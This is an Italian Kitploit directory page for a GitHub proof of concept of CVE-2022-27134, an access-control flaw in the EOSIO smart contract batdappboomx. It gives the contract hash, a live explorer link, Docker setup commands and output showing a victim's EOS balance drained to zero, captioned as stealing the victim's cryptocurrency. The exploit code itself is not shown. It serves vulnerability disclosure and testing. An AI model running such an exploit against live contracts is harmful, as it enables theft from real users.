Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-batdappboomx — CVE-2022-27134 | Kitploit
Strumenti/GitHubGitHub/kenun99/cve-batdappboomx
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubkenun99/cve-batdappboomx

CVE-batdappboomx

CVE-2022-27134

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ID CVE

CVE-2022-27134

PRODOTTO

batdappboomx è uno smart contract pubblico eseguito sulla blockchain EOSIO. Questo smart contract premia i partecipanti con criptovaluta se questi pagano una certa quantità di criptovaluta in anticipo.

Versione

L'ultima versione di questo smart contract. Il codice hash sha256 dello smart contract è 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 Verificalo sull'esploratore della blockchain https://bloks.io/account/batdappboomx.

TIPO DI PROBLEMA

vulnerabilità di controllo degli accessi

DESCRIZIONE

batdappboomx non è open-source, ma abbiamo trovato una vulnerabilità con WASAI. Gli attaccanti possono partecipare a questo gioco senza pagare nulla.

  1. attiva l'ambiente
root@kitploit:~
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm  --network host -it localhost/client-eos:eos
  1. attacca la vittima e ruba la sua criptovaluta, cioè EOS
root@kitploit:~
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] Attacked successfully. Got more cryptocurrency.
Scarica lo strumento